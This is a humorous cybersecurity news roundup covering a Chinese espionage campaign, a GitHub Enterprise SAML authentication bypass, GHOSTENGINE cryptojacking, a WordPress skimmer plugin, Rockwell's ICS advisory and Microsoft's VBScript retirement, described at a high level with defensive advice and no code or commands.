TomCyberDaily #19
Espionage campaign by China, Malicious plugins, Vulnerable ICS - Or how we call it: Typical Thursday.
1.Chinese APT Group's Sneaky Tactics Exposed in Operation Diplomatic Specter!
Attention, cyber-spies and espionage enthusiasts! There's a new APT group in town, and they're giving Chinese hackers a run for their money in the "most creative name" department. Meet TGR-STA-0043, the masterminds behind Operation Diplomatic Specter!
These crafty cybercriminals have been targeting government entities in the Middle East, Africa, and Asia since late 2022, all in the name of cyber espionage. They've been caught red-handed using rare email exfiltration techniques to steal sensitive data from compromised servers. It's like a digital version of Mission: Impossible, but with fewer explosions and more keyboard strokes.
The group's toolkit includes some shiny new backdoors, like TunnelSpecter and SweetSpecter, which are both variants of the notorious Gh0st RAT. These backdoors allow the attackers to maintain stealthy access to their targets' networks, execute commands, exfiltrate data, and deploy more malware. It's like a cybercriminal's Swiss Army knife, but with more nefarious purposes!
TunnelSpecter gets its name from its use of DNS tunneling, a technique that allows data exfiltration to fly under the radar by disguising it as normal DNS traffic. SweetSpecter, on the other hand, is named for its similarities to SugarGh0st RAT, another custom variant of Gh0st RAT that's been making the rounds in the Chinese hacking scene.
But wait, there's more! The group also uses tools like the China Chopper web shell and PlugX, which are favorites among Chinese-linked APT groups. It's like a digital version of "you are what you eat," but with more malware and fewer vegetables.
The moral of the story? If you're a government entity in the Middle East, Africa, or Asia, it's time to up your cybersecurity game. And maybe invest in some good old-fashioned carrier pigeons for your sensitive communications, because apparently, email just isn't cutting it anymore!
2.Yikes! GitHub Enterprise Server Hit by Nasty Auth Bypass Bug!
Attention, GitHub Enterprise Server (GHES) users! If you're using SAML single sign-on (SSO) authentication, you might want to sit down for this one. A critical vulnerability (CVE-2024-4985) has been discovered, and it's got a CVSS V4 Score of 10.0. That's like the cybersecurity equivalent of a perfect 10 in Olympic diving, but instead of gold medals, you get hacked!
So, what's the deal with this vulnerability? Basically, a sneaky attacker could forge a SAML response and gain admin rights, giving them full access to your instance's contents without even bothering to authenticate. It's like a digital version of "open sesame," but instead of a cave full of treasure, it's your precious repositories!
Now, before you start panicking, let's break down some of the techy terms:
SAML: It's like a secret handshake between your GHES instance and your identity provider, making sure only authorized users can access your stuff.
SSO: It's like a master key that lets you access all your apps with just one login. Convenient, but apparently also vulnerable!
Man-in-the-middle attacks: It's when an attacker intercepts your data in transit, like a nosy neighbor reading your mail. Encrypted assertions were supposed to protect against this, but apparently not!
The good news is that GitHub has already fixed the vulnerability in GHEL versions 3.12.4, 3.11.10, 3.10.12, and 3.9.15, all released on May 20th. So, if you haven't already, go update your endpoints faster than you can say "patch me up, Scotty!"
But wait, there's more! The update comes with a bunch of known issues, like custom firewall rules getting wiped, errors during configuration validation, and even backup restoration failures. It's like a digital version of "99 Bugs in the Code," but instead of beer, you get headaches!
So, there you have it, folks. If you're a GHES user with SAML SSO authentication, make sure to patch your endpoints ASAP. And maybe consider investing in some good old-fashioned carrier pigeons for your sensitive data, because apparently, even encrypted assertions aren't safe anymore!
3.GHOSTENGINE: The Cryptojacking Menace That Haunts Your EDR!
Attention, cybersecurity enthusiasts! There's a new cryptojacking campaign in town, and it's got a spooky name: GHOSTENGINE! This sneaky malware is using vulnerable drivers to disable your trusty EDR solutions and mine cryptocurrency on your dime. It's like a digital poltergeist, but instead of rattling chains, it's rattling your CPU!
The masterminds behind this campaign, dubbed REF4578 by Elastic Security Labs (or HIDDEN SHOVEL by Antiy Labs), have cooked up a complex scheme to ensure their XMRig miner stays put and keeps churning out those sweet, sweet digital coins. It's like a high-tech version of "The Purge," but instead of lawless chaos, it's lawless cryptomining!
Here's how it works: an executable file named "Tiworker.exe" kicks things off by running a PowerShell script that pretends to be a harmless PNG image. But don't be fooled! This "image" is actually a trojan horse, fetching a bunch of malicious modules from a command-and-control (C2) server. It's like a cybercriminal's version of a surprise party, but instead of cake and balloons, you get malware and headaches!
Once these modules are in place, the malware starts wreaking havoc. It disables Microsoft Defender Antivirus, clears event logs, and even deletes large files to make room for its nefarious downloads. It's like a digital version of "The Exorcist," but instead of a possessed child, it's your poor, unsuspecting computer!
The star of the show is a module called "smartsscreen.exe," or GHOSTENGINE. This clever little program uses vulnerable drivers from Avast and IObit to terminate security processes and execute the XMRig miner. It's like a ghost that can walk through walls, but instead of scaring people, it scares your EDR!
But wait, there's more! The campaign also includes a backdoor, a persistence mechanism, and even a redundancy measure to make sure the malware sticks around like a bad penny. It's like a cybercriminal's version of a Swiss Army knife, but instead of helpful tools, it's got a bunch of nasty surprises!
The moral of the story? Keep your drivers up to date, your EDR on its toes, and your wits about you! Because in the world of cybersecurity, you never know when a GHOSTENGINE might come knocking at your digital door!
4.Obscure WordPress Plugin Used to Steal Your Credit Card Info!
Online shoppers and ecommerce enthusiasts? There's a new threat lurking in the depths of WordPress plugins, and it's got its sights set on your credit card details. Introducing the Dessky Snippets plugin, the obscure little bundle of code that's been turned into a cybercriminal's best friend!
In a recent investigation, our team uncovered a sneaky piece of malware hiding inside the Dessky Snippets plugin, which has only a few hundred active installations. It's like finding a needle in a haystack, but instead of a shiny sewing tool, it's a nasty credit card skimmer!
The attackers used this plugin to inject some obfuscated PHP code into a compromised WooCommerce store. It's like a digital version of a magician's sleight of hand, but instead of pulling a rabbit out of a hat, they're pulling credit card numbers out of thin air!
Once the code is deobfuscated (a fancy term for "unscrambled"), we can see that it adds new fields to the billing form, asking for credit card details before the real checkout process even begins. It's like a phishing scam, but instead of a fake email, it's a fake form field!
But wait, there's more! The malware also POST data for these fake form fields, and once it detects them, it sends all the billing information along with the credit card details to a third-party URL. It's like a digital version of a pickpocket, but instead of swiping your wallet, they're swiping your sensitive data!
To make matters worse, the attackers even disabled the autocomplete feature on the fake form fields, reducing the likelihood that your browser will warn you about entering sensitive information. It's like they're saying, "Nothing to see here, just a regular old form field!"
So, what can you do to protect your ecommerce site from these sneaky skimmers? Keep your software up to date, use strong passwords, be selective about the scripts you use, monitor for threats, implement a firewall, and set up a Content Security Policy. It's like a digital version of a fortress, but instead of walls and moats, you've got patches and policies!
And if you're an online shopper, consider using script-blocking extensions and keeping your antivirus software up to snuff. Because when it comes to credit card skimmers, it's better to be safe than sorry!
5.Rockwell Automation Urges Disconnection of ICS from the Internet
industrial control system (ICS) users! Rockwell Automation has a message for you: disconnect your systems from the internet, or risk becoming the next victim of a cyber attack. It's like they're telling you to unplug your toaster before it becomes a Russian hacker's new toy!
The advisory is calling for immediate action, urging users to assess and remove internet connectivity for devices that weren't designed to face the wild west of the online world. It's like taking your grandma's antique vase off the shelf before your clumsy cousin comes over for a visit!
Rockwell warns that leaving these systems connected is like leaving your front door wide open with a neon sign that says "Hackers Welcome!" They want you to reduce your attack surface and exposure to unauthorized and malicious cyber activity, which is a fancy way of saying "lock your digital doors!"
This warning comes hot on the heels of a joint alert from U.S. and international cyber agencies, who say that pro-Russian hacktivists are ramping up attacks on critical operational technology systems across North America and Europe. It's like a digital version of the Cold War, but instead of nukes, they're using unsophisticated hacking techniques!
These hackers are targeting internet-exposed industrial control systems, exploiting unpatched software and weak passwords like a kid in a candy store. They're causing disruptions and posing physical threats to vulnerable OT environments, which is a polite way of saying "they're making a mess of things!"
The joint alert is urging organizations to implement multifactor authentication, disconnect PLCs and HMIs from the internet, and change those default passwords that are as easy to guess as "1234." It's like a cybersecurity version of "wash your hands, eat your vegetables, and get enough sleep!"
They're also recommending integrating cybersecurity best practices into OT system design and development, which is like building a house with a solid foundation instead of just slapping some paint on a cardboard box.
Jim Routh, chief trust officer at Saviynt, says it's not uncommon for industrial control devices to have access controls that are outside the purview of IT and IAM teams. It's like having a spare key to your house hidden under the doormat, but forgetting to tell your roommates about it!
So, if you're an industrial control system user, take Rockwell's advice and unplug those devices from the internet. And while you're at it, maybe consider updating your passwords to something a little stronger than "password123." Because when it comes to Russian hackers, it's better to be safe than sorry!
6.Microsoft Bids Adieu to VBScript, Welcomes JavaScript and PowerShell!
Attention, coders and script aficionados! Microsoft is officially pulling the plug on VBScript, the granddaddy of scripting languages. It's time to make way for the cool kids on the block: JavaScript and PowerShell!
VBScript, born in 1996, has had a good run. But let's be real, that was back when dial-up internet was still a thing and Snake was the hottest game on your Nokia phone.
Microsoft's three-phase plan to sunset VBScript starts in 2024, with the final curtain call coming at some undetermined point in the future. It's like watching a beloved sitcom character slowly fade into the background before being written off the show entirely.
But fear not, Microsoft isn't leaving you high and dry! They're encouraging everyone to jump ship to JavaScript and PowerShell, which they claim are "better suited for modern web development and automation tasks." It's like trading in your trusty old flip phone for a shiny new smartphone – there's a learning curve, but you'll never look back!
In other news, Microsoft's AI-powered Recall feature is stirring up controversy. While it promises to give you a photographic memory of your PC activities, some are worried it's a privacy disaster waiting to happen.
Recall secretly saves snapshots of your active windows, which could include sensitive info like passwords and financial data. It's like having a nosy neighbor constantly peeking through your windows and taking notes!
Microsoft swears everything is processed locally and encrypted, but the lack of content moderation has raised some eyebrows. The UK's data protection watchdog is already knocking on Microsoft's door, demanding answers.
So, as we wave goodbye to VBScript and cautiously embrace Recall, remember: in the tech world, change is inevitable. And sometimes, that change comes with a side of privacy concerns and potential security risks. But hey, at least we're not still using dial-up internet, am I right?